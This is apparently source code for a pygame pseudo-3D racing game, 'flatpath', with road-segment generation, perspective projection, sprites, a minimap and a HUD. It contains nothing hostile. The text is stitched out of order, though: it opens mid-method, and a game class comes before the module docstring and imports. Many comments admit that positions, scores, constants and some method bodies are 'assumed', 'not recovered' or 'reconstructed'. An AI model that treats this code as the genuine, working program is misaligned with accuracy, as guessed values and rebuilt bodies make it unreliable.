        #self.pygm.draw.polygon(self.surf, c, cpnts)
        self.pygm.draw.lines(self.surf, c, False, cpnts, 3)


class FPStraight(pygm.PyGMSprite):
    """The full play field: backgrounds, road, car, minimap and HUD."""

    def __init__(self, cfg, *args, **kwargs):
        super(FPStraight, self).__init__(*args, **kwargs)
        self.cfg = cfg

        self.bg_sky1 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['SKY'])
        self.bg_sky1.rect.top = 0
        self.bg_sky1.rect.left = 0
        self.disp_add(self.bg_sky1)
        self.bg_sky2 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['SKY'])
        self.bg_sky2.rect.top = 0
        self.bg_sky2.rect.left = self.bg_sky1.rect.width
        self.disp_add(self.bg_sky2)

        self.bg_hills1 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['HILLS'])
        self.bg_hills1.rect.top = 0
        self.bg_hills1.rect.left = 0
        self.disp_add(self.bg_hills1)
        self.bg_hills2 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['HILLS'])
        self.bg_hills2.rect.top = 0
        self.bg_hills2.rect.left = self.bg_hills1.rect.width
        self.disp_add(self.bg_hills2)

        self.bg_trees1 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['TREES'])
        self.bg_trees1.rect.top = 0
        self.bg_trees1.rect.left = 0
        self.disp_add(self.bg_trees1)
        self.bg_trees2 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['TREES'])
        self.bg_trees2.rect.top = 0
        self.bg_trees2.rect.left = self.bg_trees1.rect.width
        self.disp_add(self.bg_trees2)

        self.car = FPSptSprts('img_flatpath/images/sprites.png', IMG_POS_SPRITES['PLAYER_STRAIGHT'])
        #self.car.scale(self.road.cameraDepth / self.road.playerZ)
        self.car.scale(2)
        self.car.rect.top = 400
        self.car.rect.left = (640 - self.car.rect.width) / 2
        ##self.disp_add(self.car)  # car disp add after road

        #self.road = FPSptRoad((640, 240), self.cfg)
        self.road = FPSptRoadB((640, 240), self.cfg, car=self.car,
                               bg_sky=[self.bg_sky1, self.bg_sky2],
                               bg_hills=[self.bg_hills1, self.bg_hills2],
                               bg_trees=[self.bg_trees1, self.bg_trees2])
        self.road.rect.top = 240
        self.road.rect.left = 0
        self.disp_add(self.road)
        self.disp_add(self.car)

        self.rdmap = FPSptRoadMap((480, 480), self.road.rd_get_segs(whole=True),
                                  self.road.seg_len)
        self.rdmap.rect.top = 0
        self.rdmap.rect.left = 80  # assumed; garbled in source
        self.disp_add(self.rdmap)

        # HUD labels (positions/colors partly garbled in the source)
        self.rdpsd = pygm.SptLbl(str(int(self.road.speed)), c=consts.RED, font_size=16)
        self.rdpsd.rect.top = 0
        self.rdpsd.rect.left = 312
        self.disp_add(self.rdpsd)
        self.scr = pygm.SptLbl(str(int(self.road.score)), c=consts.RED, font_size=16)
        self.scr.rect.top = 0
        self.scr.rect.left = 360
        self.disp_add(self.scr)
        self.tm_once = pygm.SptLbl(str(int(self.road.tm_last_once)), c=consts.RED, font_size=16)
        self.tm_once.rect.top = 0
        self.tm_once.rect.left = 600
        self.disp_add(self.tm_once)

        # progress (track position) and speed bars
        self.prog = FPSptProgress((4, 100), c_prog=consts.YELLOW)
        self.prog.rect.top = 70
        self.prog.rect.left = 610
        #self.prog.rotate(180)
        self.disp_add(self.prog)
        self.spd = FPSptProgress((4, 100), c_prog=consts.GREEN)
        self.spd.rect.top = 70
        self.spd.rect.left = 602
        #self.spd.rotate(180)
        self.disp_add(self.spd)

    def rdmap_hide(self):
        self.rdmap.hide()

    def rdmap_reset(self):
        # rebuild the minimap for the current segments (body assumed;
        # garbled in the source)
        self.disp_del(self.rdmap)
        self.rdmap = FPSptRoadMap((480, 480), self.road.rd_get_segs(whole=True),
                                  self.road.seg_len)
        self.rdmap.rect.top = 0
        self.rdmap.rect.left = 80
        self.disp_add(self.rdmap)

    def road_reset(self):
        self.road.rd_reset()
        self.rdmap_reset()

    def road_reset_keep_segs(self):
        self.road.rd_reset(init=False, keep_segs=True)

    def road_reset_from_file(self, segs_file='sr_roads/sr_road.txt'):
        segs_file = utils.dir_abs(segs_file, __file__)
        self.road.rd_reset(init=False, keep_segs=False, segs_file=segs_file)
        self.rdmap_reset()

    def road_segs_to_file(self, segs_file=None):
        if not segs_file:
            segs_file = 'sr_roads/sr_road_' + str(int(time.time())) + '.txt'
        segs_file = utils.dir_abs(segs_file, __file__)
        self.road.rd_seg_json_save(segs_file)

    def handle_event(self, events, *args, **kwargs):
        #return events
        r_events = []
        for event in events:
            if event.type == self.pglc.KEYUP:
                k = event.key
                if k == self.pglc.K_SPACE:
                    # hide / show road map
                    self.rdmap_hide()
                elif k == self.pglc.K_RETURN:
                    self.road_reset()
                elif k == self.pglc.K_TAB:
                    self.road_reset_keep_segs()
                elif k == self.pglc.K_BACKSPACE:
                    self.road_reset_from_file()
                elif k == self.pglc.K_SLASH:
                    self.road_segs_to_file()
                else:
                    r_events.append(event)
            elif event.type == self.pglc.KEYDOWN:
                r_events.append(event)
            else:
                r_events.append(event)
        return r_events

    def refresh(self, fps_clock, *args, **kwargs):
        self.rdpsd.lbl_set(str(int(self.road.speed)))
        self.scr.lbl_set(str(int(self.road.score)))
        self.tm_once.lbl_set(str(int(self.road.tm_last_once)))
        prg = self.road.position / self.road.track_len
        self.prog.progress(prg)
        spdc = self.road.speed / self.road.speed_max
        self.spd.progress(spdc)
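
# Roads can be snapshotted and replayed: SLASH saves the current segment list
# via FPSptRoadB.rd_seg_json_save() (road_segs_to_file above) and BACKSPACE
# reloads it through road_reset_from_file(). Since each segment is a plain
# dict, a saved road file is ordinary JSON; a minimal sketch of inspecting one
# by hand, assuming utils.json_dumps/json_loads wrap the stdlib json module:
#
#   import json
#
#   with open('sr_roads/sr_road.txt') as fi:
#       segs = json.loads(fi.read())
#   # each entry looks like:
#   # {'index': 0,
#   #  'p1': {'world': {'z': 0.0, 'y': 0.0}, 'camera': {}, 'screen': {}},
#   #  'p2': {'world': {'z': 200.0, 'y': 0.0}, 'camera': {}, 'screen': {}},
#   #  'curve': 0.0, 'color': {...}, 'sprites': [...], 'looped': 0}
#   print len(segs), 'segments,', len(segs) * 200.0, 'track length'
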
"""flatpath

References:
    http://codeincomplete.com/posts/javascript-racer/
    http://www.extentofthejam.com/pseudo/
    http://pixel.garoux.net/screen/game_list

Usage:
    * UP/DOWN/LEFT/RIGHT
    * SPACE : hide/show road map
    * TAB : replay this road
    * RETURN : go to a new road

TODO:
    * hill road
    * more road sprites
"""

import math
import random
import time

from starfish import pygm
from starfish import consts
from starfish import sptdraw
from starfish import utils


# region tables for the background / sprite sheets; unrecovered coordinates
# follow javascript-racer's background.png and sprites.png atlas
IMG_POS_BACKGROUND = {
    'HILLS': {'x': 5, 'y': 5, 'w': 1280, 'h': 480},
    'SKY': {'x': 5, 'y': 495, 'w': 1280, 'h': 480},
    'TREES': {'x': 5, 'y': 985, 'w': 1280, 'h': 480},
}

IMG_POS_SPRITES = {
    'PALM_TREE': {'x': 5, 'y': 5, 'w': 215, 'h': 540},
    'BILLBOARD08': {'x': 230, 'y': 5, 'w': 385, 'h': 265},
    'TREE1': {'x': 625, 'y': 5, 'w': 360, 'h': 360},
    'DEAD_TREE2': {'x': 1205, 'y': 490, 'w': 150, 'h': 260},
    'BILLBOARD09': {'x': 150, 'y': 555, 'w': 328, 'h': 282},
    'BOULDER3': {'x': 230, 'y': 280, 'w': 320, 'h': 220},
    'COLUMN': {'x': 995, 'y': 5, 'w': 200, 'h': 315},
    'BILLBOARD01': {'x': 625, 'y': 375, 'w': 300, 'h': 170},
    'BILLBOARD06': {'x': 488, 'y': 555, 'w': 298, 'h': 190},
    'BILLBOARD05': {'x': 5, 'y': 897, 'w': 298, 'h': 190},
    'BILLBOARD07': {'x': 313, 'y': 897, 'w': 298, 'h': 190},
    'BOULDER2': {'x': 621, 'y': 897, 'w': 298, 'h': 140},
    'TREE2': {'x': 1205, 'y': 5, 'w': 282, 'h': 295},
    'BILLBOARD04': {'x': 1205, 'y': 310, 'w': 268, 'h': 170},
    'DEAD_TREE1': {'x': 5, 'y': 555, 'w': 135, 'h': 332},
    'BOULDER1': {'x': 1205, 'y': 760, 'w': 168, 'h': 248},
    'BUSH1': {'x': 5, 'y': 1097, 'w': 240, 'h': 155},
    'CACTUS': {'x': 929, 'y': 897, 'w': 235, 'h': 118},
    'BUSH2': {'x': 255, 'y': 1097, 'w': 232, 'h': 152},
    'BILLBOARD03': {'x': 5, 'y': 1262, 'w': 230, 'h': 220},
    'BILLBOARD02': {'x': 245, 'y': 1262, 'w': 215, 'h': 220},
    'STUMP': {'x': 995, 'y': 330, 'w': 195, 'h': 140},
    'SEMI': {'x': 1365, 'y': 490, 'w': 122, 'h': 144},
    'TRUCK': {'x': 1365, 'y': 644, 'w': 100, 'h': 78},
    'CAR03': {'x': 1383, 'y': 760, 'w': 88, 'h': 55},
    'CAR02': {'x': 1383, 'y': 825, 'w': 80, 'h': 59},
    'CAR04': {'x': 1383, 'y': 894, 'w': 80, 'h': 57},
    'CAR01': {'x': 1205, 'y': 1018, 'w': 80, 'h': 56},
    'PLAYER_UPHILL_LEFT': {'x': 1383, 'y': 961, 'w': 80, 'h': 45},
    'PLAYER_UPHILL_STRAIGHT': {'x': 1295, 'y': 1018, 'w': 80, 'h': 45},
    'PLAYER_UPHILL_RIGHT': {'x': 1385, 'y': 1018, 'w': 80, 'h': 45},
    'PLAYER_LEFT': {'x': 995, 'y': 480, 'w': 80, 'h': 41},
    'PLAYER_STRAIGHT': {'x': 1085, 'y': 480, 'w': 80, 'h': 41},
    'PLAYER_RIGHT': {'x': 995, 'y': 531, 'w': 80, 'h': 41},
}

FP_COLOR_WHITE = '#FFFFFF'
FP_COLOR_BLACK = '#000000'
FP_COLOR_YELLOW = '#EEEE00'
FP_COLOR_BLUE = '#00EEEE'

# palette; unrecovered entries follow javascript-racer's COLORS
FP_COLORS = {
    'SKY': '#72D7EE',
    'TREE': '#005108',
    'FOG': '#005108',
    'LIGHT': {'road': '#6B6B6B', 'grass': '#10AA10', 'rumble': '#555555'},
    'DARK': {'road': '#696969', 'grass': '#009A00', 'rumble': '#BBBBBB'},
    'START': {'road': FP_COLOR_WHITE, 'grass': FP_COLOR_WHITE, 'rumble': FP_COLOR_WHITE},
    'FINISH': {'road': FP_COLOR_BLACK, 'grass': FP_COLOR_BLACK, 'rumble': FP_COLOR_BLACK},
    'START_Y': {'road': FP_COLOR_YELLOW, 'grass': FP_COLOR_YELLOW, 'rumble': FP_COLOR_YELLOW},
}

# road presets; unrecovered values follow javascript-racer's ROAD table
FP_ROAD = {
    'LENGTH': {'NONE': 0, 'SHORT': 25, 'MEDIUM': 50, 'LONG': 100},  # num segments
    'CURVE': {'NONE': 0, 'EASY': 2, 'MEDIUM': 4, 'HARD': 6},
    'HILL': {'NONE': 0, 'LOW': 20, 'MEDIUM': 40, 'HIGH': 60},
}

# road-side pickups and obstacles; positive scores reward, negative punish
FP_ROAD_SPRTS = {
    'chest': {'imgs': ['img_sprts/i_chest1.png'], 'score': 100,},
    'coin1': {'imgs': ['img_sprts/i_coin1.png'], 'score': 1,},  # score not recovered
    'coin5': {'imgs': ['img_sprts/i_coin5.png'], 'score': 5,},
    'coin20': {'imgs': ['img_sprts/i_coin20.png'], 'score': 20,},
    'health': {'imgs': ['img_sprts/i_health.png'], 'score': 10,},
    'pot1': {'imgs': ['img_sprts/i_pot1.png'], 'score': -5,},
    'pot2': {'imgs': ['img_sprts/i_pot2.png'], 'score': -1,},
    'shell': {'imgs': ['img_sprts/p_shell.png'], 'score': -20,},
    'rockd': {'imgs': ['img_sprts/rock_d2.png'], 'score': -10,},
    'rockr': {'imgs': ['img_sprts/rock_r2.png'], 'score': -10,},  # score not recovered
    #'bear': {'imgs': ['img_sprts/bear2.png'], 'score': -80,},
    #'dinof': {'imgs': ['img_sprts/dinof2.png'], 'score': -50,},
    'blobb': {'imgs': ['img_sprts/blobb1.png'], 'score': -50,},
    'chick_fly': {'imgs': ['img_sprts/chick_fly3.png'], 'score': 70,},
    'clown': {'imgs': ['img_sprts/clown1.png'], 'score': -100,},
}

class SptTmpx(sptdraw.SptDrawBase):
    def __init__(self, size, *args, **kwargs):
        super(SptTmpx, self).__init__(size)
        self.draw_on()

    def draw_on(self, *args, **kwargs):
        self.fill(consts.GREEN)
        self.pygm.draw.circle(self.surf, consts.WHITE,
                              (self.size[0] / 2, self.size[1] / 2),
                              self.size[0] / 2, 0)


class SptTmpi(pygm.SptImg):
    def __init__(self, img_file, *args, **kwargs):
        super(SptTmpi, self).__init__(img_file)


class FPSptBg(pygm.SptImgOne):
    def __init__(self, img_file, pos, *args, **kwargs):
        super(FPSptBg, self).__init__(img_file, pos)


class FPSptSprts(pygm.SptImgOne):
    def __init__(self, img_file, pos, *args, **kwargs):
        super(FPSptSprts, self).__init__(img_file, pos)


class FPSptFog(sptdraw.SptDrawBase):
    # stacked translucent bands, fading toward the bottom of the strip
    def __init__(self, size, c=[0, 81, 8, 0], h=30, *args, **kwargs):
        super(FPSptFog, self).__init__(size)
        self.c = c
        self.h = h
        self.draw_on()

    def draw_on(self, *args, **kwargs):
        d = 2  # band height; exact value not recovered
        n = self.h / d
        for i in range(n):
            rct = [0, i * d, self.size[0], d]
            #ca = 255 / n * (n - i)
            ca = 200 / n * (n - i)
            self.c[3] = ca
            self.pygm.draw.rect(self.surf, self.c, rct)


class FPSptRdSprts(pygm.SptImg):
    def __init__(self, img_file, *args, **kwargs):
        super(FPSptRdSprts, self).__init__(img_file)

    @classmethod
    def create_by_img(cls, img):
        return cls(img)
        # for test
        #o = SptTmpx((40, 40))
        #return o

class FPSptRoadB(sptdraw.SptDrawBase):
    def __init__(self, size, cfg, *args, **kwargs):
        super(FPSptRoadB, self).__init__(size)
        self.cfg = cfg
        self.car = kwargs.get('car')
        self.bg_sky = kwargs.get('bg_sky')
        self.bg_hills = kwargs.get('bg_hills')
        self.bg_trees = kwargs.get('bg_trees')
        self.clr_dark_road = utils.clr_from_str(FP_COLORS['DARK']['road'])
        self.clr_dark_grass = utils.clr_from_str(FP_COLORS['DARK']['grass'])
        self.rd_reset(init=True)
        self.add_fog()

    def prms_reset(self, keep_segs=False):
        self.e_keys_up = []
        self.e_keys_dn = []
        self.flag_check_event = True  # read in handle_event; default assumed
        self.camera_x = 0.0
        self.camera_y = 0.0
        self.camera_z = 500.0#1000.0#0.0 == self.camera_h
        self.xw = 0.0
        self.yw = 0.0
        self.zw = 0.0
        self.xc = 0.0
        self.yc = 0.0
        self.zc = 0.0
        ##
        self.xp = 0.0
        self.yp = 0.0
        self.xs = 0.0
        self.ys = 0.0
        self.d = 200.0#100.0#10.0#30.0#1.0
        self.w = self.size[0]
        self.h = self.size[1]
        if not keep_segs:
            self.segments = []
            self.rd_sprt_objs = {}
            self.rd_sprt_cache = []  # for sprites render order
        self.track_len = 0.0
        self.seg_len = 200.0#100.0#20.0#60.0#
        self.road_w = 2400#2000#600#200#
        self.camera_h = 500.0#1000.0#
        self.speed_max = 300.0#180.0#200.0#100.0
        self.lane_w = 60
        self.seg_n = 300#200
        #self.seg_draw_n = 200#150
        self.seg_draw_n = 70#100#
        self.speed = 0.0
        self.position = 0.0
        self.player_x = 0.0#100.0#1000.0#
        self.centrifugal = 0.1#0.06#0.08#0.01#0.3
        self.player_seg = None
        self.base_seg = None  # the segment just under the car
        self.player_di = 0  # 0:^ 1:> 2:v 3:<
        self.player_go = 0  # 0:- 1:^ 2:v
        self.speed_dt_up = 1.0#2.0#3.0
        self.speed_dt_dn = 2.0#4.0#6.0
        self.speed_dt_na = 1.0#3.0
        self.player_x_dt = 20.0  # only referenced from commented-out code; value not recovered
        self.last_seg_i = 0
        self.score = 0
        self.game_over = False
        self.game_score = 0.0
        self.tm_start = 0.0
        self.tm_end = 0.0
        self.tm_last_once = 0.0
        self.sky_speed = 0.1#0.05#
        self.hill_speed = 0.2#0.1#
        self.tree_speed = 0.3#0.15#

    def rd_reset(self, init=False, keep_segs=False, segs_file=None):
        if not keep_segs:
            # live sprite objects only exist after the first reset
            if not init:
                self.rd_sprts_del_all_objs()
        self.prms_reset(keep_segs=keep_segs)
        if segs_file is not None:
            try:
                segs = self.rd_seg_json_load(segs_file)
                self.segments = segs
                self.track_len = len(self.segments) * self.seg_len
            except Exception as e:
                self.init_rd_segs_rand_1()
        else:
            if not keep_segs:
                self.init_rd_segs_rand_1()
        self.draw_on()
        self.rd_seg_render()

    def init_rd_segs_rand_1(self):
        #self.rd_seg_init(self.seg_n)
        #self.rd_seg_init(100)#20#500#2#10#4#1#
        #self.rd_seg_init(random.randint(30, 100))
        self.rd_seg_init(random.randint(1, 10))  # for a3c train
        self.rd_seg_init_rand_curve()
        #self.add_curves()
        #self.add_low_rolling_hills(20, 2.0)
        ##self.add_low_rolling_hills(30, 4.0)
        #self.rd_seg_init_rand(10)#50#10#3#1
        #segnrand = random.randint(3, 30)
        segnrand = random.randint(2, 6)  # for a3c train
        self.rd_seg_init_rand(segnrand)
        # for segment draw
        #self.rd_seg_init(self.seg_draw_n)
        self.rd_seg_init(10)  # for a3c train
        self.rd_start_seg_init()
        self.rd_sprts_init_rand()

    def draw_on(self, *args, **kwargs):
        self.fill(self.clr_dark_grass)

    def add_fog(self):
        self.fog = FPSptFog(self.size)
        self.fog.rect.top = 0
        self.disp_add(self.fog)

    def get_seg_base_i(self, pos=None):
        if pos is None:
            pos = self.position
        i = int(pos / self.seg_len)
        #x#i = int(utils.math_round(pos / self.seg_len))
        #i = int(math.floor(pos / self.seg_len))
        seg_n = len(self.segments)
        i = (i + seg_n) % seg_n
        return i

    def rd_get_segs(self, whole=False):
        if whole:
            segs = self.segments
        else:
            segs = self.segments[:-self.seg_draw_n]
        return segs
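
    # An illustration of the wrap-around lookup done by get_seg_base_i()
    # above: the scalar position along the track picks the segment under the
    # car, modulo the number of segments, so the road loops seamlessly.
    @staticmethod
    def _demo_seg_base_i(position, seg_len, seg_n):
        i = int(position / seg_len)
        return (i + seg_n) % seg_n

    # e.g. with seg_len=200.0 and 300 segments, position 60100.0 wraps to
    # segment 0: FPSptRoadB._demo_seg_base_i(60100.0, 200.0, 300) == 0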

    # #### geometry #### #

    def geo_prjc_scale(self, d, zc):
        if zc == 0.0:
            return 1.0
        else:
            return d / zc

    def xc_to_xp(self, xc, d, zc):
        if zc == 0.0:
            #xp = float('inf')
            #xp = 2 ** 64
            xp = xc
        else:
            xp = xc * (d / zc)
        return xp

    def yc_to_yp(self, yc, d, zc):
        if zc == 0.0:
            #yp = float('inf')
            #yp = 2 ** 64
            yp = yc
        else:
            yp = yc * (d / zc)
        return yp

    def xp_to_xs(self, xp, w):
        #xs = w / 2.0 + w / 2.0 * xp
        xs = w / 2.0 + xp
        return xs

    def yp_to_ys(self, yp, h):
        #ys = h / 2.0 - h / 2.0 * yp
        ys = h / 2.0 - yp
        return ys
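
    # A self-contained sketch of the projection pipeline above: a camera-space
    # point (xc, yc, zc) is scaled by d / zc (d is the eye-to-screen distance)
    # and shifted to screen coordinates, which is exactly what xc_to_xp/xp_to_xs
    # and yc_to_yp/yp_to_ys do in two steps. The defaults mirror prms_reset
    # (d=200, road surface 640x240).
    @staticmethod
    def _demo_project(xc, yc, zc, d=200.0, w=640.0, h=240.0):
        scale = 1.0 if zc == 0.0 else d / zc
        xs = w / 2.0 + xc * scale
        ys = h / 2.0 - yc * scale
        return xs, ys

    # e.g. a road edge at xc=1200 seen 2000 units ahead with the camera at
    # height 500: FPSptRoadB._demo_project(1200.0, 500.0, 2000.0) == (440.0, 70.0)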

    def rd_seg_init(self, a=500):
        for n in range(a):
            self.rd_seg_add(0.0, 0.0)

    def rd_seg_add(self, curve=0.0, yw=0.0):
        #print '+', curve, yw
        n = len(self.segments)
        if n % 2 == 0:
            c = FP_COLORS['LIGHT']
            #c = {'road': FP_COLOR_WHITE}
        else:
            c = FP_COLORS['DARK']
            #c = {'road': FP_COLOR_BLACK}
        seg = {
            'index': n,
            'p1': {'world': {'z': (n + 1) * self.seg_len, 'y': self.seg_lasy_y()},
                   'camera': {}, 'screen': {}},
            'p2': {'world': {'z': (n + 2) * self.seg_len, 'y': yw},
                   'camera': {}, 'screen': {}},
            'curve': curve,
            'color': c,
            'sprites': [],
            'looped': 0,
        }
        self.segments.append(seg)
        self.track_len = len(self.segments) * self.seg_len

    def seg_lasy_y(self):
        seg_n = len(self.segments)
        if seg_n == 0:
            return 0.0
        else:
            return self.segments[seg_n - 1]['p2']['world'].get('y', 0.0)

    def rd_seg_init_rand(self, n=50):
        #print 'rd_seg_init_rand', n
        for i in range(n):
            p = random.random()
            #print p
            rl = random.choice([1, -1])
            enter = random.randint(10, 40)
            hold = random.randint(10, 40)
            leave = random.randint(10, 40)
            if p < 0.5:  # threshold not recovered
                curve = 0.0
                yw = 0.0
                # yw = random.random() * 10.0
            #elif p < 0.8:
            #    curve = 0.0
            else:
                curve = rl * random.random() * 8.0
                yw = 0.0
            self.add_road(enter, hold, leave, curve, yw)

    def rd_seg_init_rand_2(self, n=50):
        for i in range(n):
            p = random.random()
            rl = random.choice([1, -1])
            if p < 0.35:
                self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],
                              FP_ROAD['LENGTH']['MEDIUM'], rl * FP_ROAD['CURVE']['EASY'])
            else:
                enter = random.randint(10, 100)
                hold = random.randint(10, 100)
                leave = random.randint(10, 100)
                self.add_road(enter, hold, leave, 0.0, 0.0)

    def rd_seg_init_rand_curve(self, n=5):
        for i in range(n):
            rl = random.choice([1, -1])
            enter = random.randint(10, 40)
            hold = random.randint(10, 40)
            leave = random.randint(10, 40)
            curve = rl * random.random() * 8.0
            yw = 0.0
            self.add_road(enter, hold, leave, curve, yw)

    def rd_start_seg_init(self, n=3):
        seg_n = len(self.segments)
        if seg_n == 0:
            return
        #self.segments[0]['color'] = FP_COLORS['START_Y']
        #self.segments[2]['color'] = FP_COLORS['START_Y']
        for i in range(n):
            self.segments[i]['color'] = FP_COLORS['START_Y']

    def rd_sprts_init_rand(self, n=None):
        seg_n = len(self.segments)
        if n is None:
            #n = seg_n / 20
            n = seg_n / random.randint(10, 30)
        for i in range(n):
            j = random.randint(10, seg_n - 10)
            sprt = random.choice(FP_ROAD_SPRTS.keys())
            s = {
                'name': sprt,
                'type': 1,  # image / animate / ...
                'obj': None,  # need to create at render
                ##'x_i': None,  # get real (random) x from x_pos
                'x_i': random.randint(0, 4),
                'score': FP_ROAD_SPRTS[sprt].get('score', 0),
            }
            self.segments[j]['sprites'].append(s)

    def rd_sprts_del_all_objs(self):
        for k, sprt in self.rd_sprt_objs.items():
            #print k, sprt
            self.disp_del(sprt)
            del self.rd_sprt_objs[k]

    def util_limit(self, value, mn, mx):
        return max(mn, min(value, mx))

    def util_accelerate(self, v, accel, dt):
        return v + (accel * dt)

    def util_increase(self, start, increment, mx):
        result = start + increment
        while (result >= mx):
            result -= mx
        while (result < 0):
            result += mx
        return result

    def util_ease_in(self, a, b, percent):
        return a + (b - a) * math.pow(percent, 2)

    def util_ease_out(self, a, b, percent):
        return a + (b - a) * (1 - math.pow(1 - percent, 2))

    def util_ease_in_out(self, a, b, percent):
        return a + (b - a) * ((-math.cos(percent * math.pi) / 2) + 0.5)

    def util_curve_percent_remaining(self, n, total):
        return (n % total) / total

    def add_road(self, enter, hold, leave, curve, yw=0.0):
        start_y = self.seg_lasy_y()
        end_y = start_y + (int(yw) * self.seg_len)
        total = enter + hold + leave
        for n in range(enter):
            self.rd_seg_add(self.util_ease_in(0, curve, float(n)/enter),
                            self.util_ease_out(start_y, end_y, float(n)/total))
        for n in range(hold):
            self.rd_seg_add(curve,
                            self.util_ease_out(start_y, end_y, (float(n)+enter)/total))
        for n in range(leave):
            self.rd_seg_add(self.util_ease_out(curve, 0, float(n)/leave),
                            self.util_ease_out(start_y, end_y, (float(n)+enter+hold)/total))

    def add_curves(self):
        self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],
                      FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['EASY'])
        self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],
                      FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['CURVE']['MEDIUM'])
        self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],
                      FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['CURVE']['EASY'])
        self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],
                      FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['EASY'])
        self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],
                      FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['MEDIUM'])
        self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],
                      FP_ROAD['LENGTH']['MEDIUM'], 0.0)

    def add_low_rolling_hills(self, num, height):
        num = num or FP_ROAD['LENGTH']['SHORT']
        height = height or FP_ROAD['HILL']['LOW']
        self.add_road(num, num, num, 0, height/2.0)
        self.add_road(num, num, num, 0, -height)
        self.add_road(num, num, num, 0, height)
        self.add_road(num, num, num, 0, 0)
        self.add_road(num, num, num, 0, height/2.0)
        self.add_road(num, num, num, 0, 0)
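
    # How add_road() above shapes one turn: curvature eases in over `enter`
    # segments, holds for `hold`, then eases back out over `leave`, via the
    # util_ease_* formulas. A standalone profile generator for illustration:
    @staticmethod
    def _demo_curve_profile(enter, hold, leave, curve):
        ease_in = lambda a, b, p: a + (b - a) * math.pow(p, 2)
        ease_out = lambda a, b, p: a + (b - a) * (1 - math.pow(1 - p, 2))
        prof = []
        for n in range(enter):
            prof.append(ease_in(0.0, curve, float(n) / enter))
        prof.extend([curve] * hold)
        for n in range(leave):
            prof.append(ease_out(curve, 0.0, float(n) / leave))
        return prof

    # e.g. _demo_curve_profile(2, 2, 2, 4.0) == [0.0, 1.0, 4.0, 4.0, 4.0, 1.0]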

    def rd_seg_get_cleared(self, segs=None):
        # a copy of segs that is safe for JSON: live sprite objs nulled out
        if segs is None:
            segs = self.segments
        segs_c = []
        for seg in segs:
            if not seg['sprites']:
                segs_c.append(seg)
                continue
            seg_c = {}
            for k, v in seg.items():
                if k not in ['sprites']:
                    seg_c[k] = v
                else:
                    seg_c[k] = []
                    for spr in seg['sprites']:
                        spr_n = {}
                        for sk, sv in spr.items():
                            if sk not in ['obj']:
                                spr_n[sk] = sv
                            else:
                                spr_n[sk] = None
                        seg_c[k].append(spr_n)
            segs_c.append(seg_c)
        return segs_c

    def rd_seg_json_save(self, f):
        sc = self.rd_seg_get_cleared(self.segments)
        s = utils.json_dumps(sc)
        with open(f, 'w') as fo:
            fo.write(s)

    def rd_seg_json_load(self, f):
        with open(f, 'r') as fi:
            s = fi.read()
        return utils.json_loads(s)  # counterpart of utils.json_dumps (assumed)
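
    # The pair above is a plain JSON round-trip of the segment dicts, with
    # live sprite objects nulled out first by rd_seg_get_cleared(). The same
    # round-trip with only the stdlib, assuming utils.json_dumps/json_loads
    # wrap json.dumps/json.loads:
    @staticmethod
    def _demo_segs_roundtrip(segs, path):
        import json
        with open(path, 'w') as fo:
            json.dump(segs, fo)
        with open(path, 'r') as fi:
            return json.load(fi)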

    # older render experiments, kept for reference; names and parts of the
    # bodies are reconstructed
    def rd_seg_render__1_o(self):
        """straight"""
        xc1 = self.road_w / 2 - self.player_x
        xc2 = -self.road_w / 2 - self.player_x
        xc3 = self.road_w / 2 - self.player_x
        xc4 = -self.road_w / 2 - self.player_x
        yc = self.camera_h
        #print '=' * 80
        #print 'self.position', self.position
        for i, seg in enumerate(self.segments):
            zw1 = seg['p1']['world']['z']
            zw2 = seg['p2']['world']['z']
            zc1 = zw1 - self.camera_z - self.position
            zc2 = zw2 - self.camera_z - self.position
            #zc1 = self.position - (zw1 - self.camera_z)
            #zc2 = self.position - (zw2 - self.camera_z)
            xp1 = self.xc_to_xp(xc1, self.d, zc1)
            xs1 = self.xp_to_xs(xp1, self.w)
            xp2 = self.xc_to_xp(xc2, self.d, zc1)
            xs2 = self.xp_to_xs(xp2, self.w)
            xp3 = self.xc_to_xp(xc3, self.d, zc2)
            xs3 = self.xp_to_xs(xp3, self.w)
            xp4 = self.xc_to_xp(xc4, self.d, zc2)
            xs4 = self.xp_to_xs(xp4, self.w)
            yp1 = self.yc_to_yp(yc, self.d, zc1)
            ys1 = self.yp_to_ys(yp1, self.h)
            ys2 = ys1
            yp3 = self.yc_to_yp(yc, self.d, zc2)
            ys3 = self.yp_to_ys(yp3, self.h)
            ys4 = ys3
            self.render_polygon(None, 0, ys1, self.w, ys2, self.w, ys4, 0, ys3,
                                seg['color']['grass'])
            self.render_polygon(None, xs1, ys1, xs2, ys2, xs4, ys4, xs3, ys3,
                                seg['color']['road'])
            xpl1 = self.xc_to_xp(xc1 - self.lane_w, self.d, zc1)
            xsl1 = self.xp_to_xs(xpl1, self.w)
            xpl2 = self.xc_to_xp(xc2 + self.lane_w, self.d, zc1)
            xsl2 = self.xp_to_xs(xpl2, self.w)
            xpl3 = self.xc_to_xp(xc3 - self.lane_w, self.d, zc2)
            xsl3 = self.xp_to_xs(xpl3, self.w)
            xpl4 = self.xc_to_xp(xc4 + self.lane_w, self.d, zc2)
            xsl4 = self.xp_to_xs(xpl4, self.w)
            self.render_polygon(None, xs1, ys1, xsl1, ys1, xsl3, ys3, xs3, ys3,
                                seg['color']['rumble'])
